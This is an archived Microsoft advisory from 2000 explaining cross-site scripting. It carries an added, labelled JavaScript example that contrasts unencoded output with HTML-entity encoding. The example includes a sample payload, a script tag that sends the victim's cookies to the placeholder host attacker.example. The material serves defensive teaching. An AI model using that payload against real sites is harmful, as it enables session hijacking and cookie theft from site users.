Information on Cross-Site Scripting Security Vulnerability

Archived content. No warranty is made as to technical accuracy. Content may contain URLs that were valid when originally published, but now link to sites or pages that no longer exist.

Originally Posted: February 02, 2000

Microsoft has identified a serious security vulnerability that could potentially affect many web sites and their users. The vulnerability, known as "Cross-Site Scripting", is not specific to any vendor's products and does not result from a defect in any of them. Instead, it results from a common web coding practice: including input supplied by one user in pages served to other users without first validating or encoding it. Microsoft is working with the CERT Coordination Center and other industry leaders to provide information about this issue to customers.

Cross-Site Scripting could enable a malicious user to introduce executable script of his choice into another user's web session, where it runs in the victim's browser with the privileges of the web site that served the page. Once the script is running, it could take a wide range of actions, from monitoring the user's web session and forwarding a copy of it (such as the user's cookies) to the malicious user, to changing what is displayed on the user's screen. Even more seriously, if the web site stores the injected input and redisplays it, the script becomes persistent: the next time the user returned to the web site, the malicious user's script would start running again.

The long-term solution to the problem requires web sites and web site developers to review their code and verify that it adheres to secure coding practices, in particular that untrusted input is validated and encoded before it is written into a page. However, in the short term, there are some steps that customers can take to minimize the likelihood of being affected by this issue. The FAQ discusses these in detail.
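The coding practice described above, and the filtering that the advisory asks developers to add, are illustrated by the following example. It is added here for clarity and is not code from the original Microsoft advisory or from any Microsoft product; the page template, the greeting functions and the request parameter value are all constructed for the illustration.

```javascript
// Added example (not part of the original advisory). Shows a page that
// echoes a request parameter into HTML unchanged, beside the same page
// with the parameter encoded before it is written out.

// Constructed value of a request parameter, as a malicious user might
// place it in a link sent to a victim. No real site is involved.
const UNTRUSTED_NAME =
  '<script>document.location="http://attacker.example/?c="+document.cookie</script>';

// Vulnerable: the untrusted value is concatenated straight into the page,
// so the victim's browser parses it as markup and runs the script in the
// security context of the site that served the page.
function greetUnsafe(name) {
  return `<html><body><h1>Hello, ${name}!</h1></body></html>`;
}

// HTML entity encoding for text placed between tags or inside a quoted
// attribute value. It replaces the five characters that can change the
// structure of the surrounding HTML.
function encodeHtml(text) {
  const map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#x27;',
  };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: identical page, but the untrusted value is encoded, so the
// browser displays it as literal text instead of executing it.
function greetSafe(name) {
  return `<html><body><h1>Hello, ${encodeHtml(name)}!</h1></body></html>`;
}

// Check used to compare the two responses: does the HTML still contain a
// raw <script> start tag? Sufficient for this payload, not a general test.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log('unsafe page carries a script tag:', containsScriptTag(greetUnsafe(UNTRUSTED_NAME)));
console.log('safe page carries a script tag:  ', containsScriptTag(greetSafe(UNTRUSTED_NAME)));
console.log(greetSafe(UNTRUSTED_NAME));
```

The encoding shown is only correct for the HTML body and quoted-attribute contexts it is used in here; a value written into a script block, a URL or a style attribute needs the encoding appropriate to that context, and the advisory's recommendation to review all code paths that echo input applies to each of them.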

Microsoft is working with the CERT Coordination Center and other industry leaders to alert all affected communities (web site operators, web developers, and web users) to the issue, to encourage web sites to make the needed changes expeditiously, to provide technical information for web sites and web site developers, and to let customers know what they can do to protect themselves in the meantime. Additional information on the issue can be found at:

In addition, Microsoft Technical Support is offering comprehensive support to web sites and web developers who need help in reviewing their code and making the needed changes:

  • Microsoft Technical Support and Microsoft Consulting Services have established a Support Team focused on this issue.

  • Microsoft Technical Support will provide round-table discussions to help customers who need additional technical information on the issue. More information will be available soon.

  • Microsoft is developing a set of tools that will assist web developers in filtering and encoding untrusted input. These tools are under development, and we will make them available as soon as possible.

Revisions

  • Created February 02, 2000